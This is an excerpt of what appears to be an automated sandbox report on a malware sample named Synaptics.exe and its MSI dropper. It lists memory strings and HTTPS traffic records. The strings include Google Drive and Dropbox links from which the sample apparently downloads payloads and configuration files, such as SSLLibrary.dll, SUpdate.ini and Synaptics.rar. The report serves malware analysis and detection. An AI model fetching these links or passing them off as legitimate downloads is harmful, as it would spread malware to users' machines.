                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqG
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqb
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqd
                              Source: Synaptics.exe, 00000004.00000002.2401434889.0000000007C1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396056277.000000000430E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2401549375.0000000007E9E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqtzq
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqz/
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrc
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrse
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrt=dZC=
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsH.
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt8.
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtF
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtM
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtce
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtfor
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth:
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtp9
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduB
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduD
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwBov9
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwa
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwc
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000004.00000002.2409559052.000000000FE6E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx.7
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxB
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxa
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyC
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyc
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadye
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzx$
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~-
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~H5
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~M
                              Source: MSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: MSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: 674551.msi.1.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/A
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2408055892.000000000EECE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2408055892.000000000EE32000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154958231.000000000533C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2408827318.000000000EF0C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2408055892.000000000EE58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4Qg
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4Qg7
                              Source: Synaptics.exe, 00000004.00000002.2396842669.000000000535D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000004.00000002.2396842669.000000000535D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/k
                              Source: MSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                              Source: 674551.msi.1.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: 674551.msi.1.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: MSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX
                              Source: 674551.msi.1.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49709 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49710 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49714 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49717 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49716 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49715 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49719 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49731 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49743 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.5:49745 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49748 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49750 version: TLS 1.2
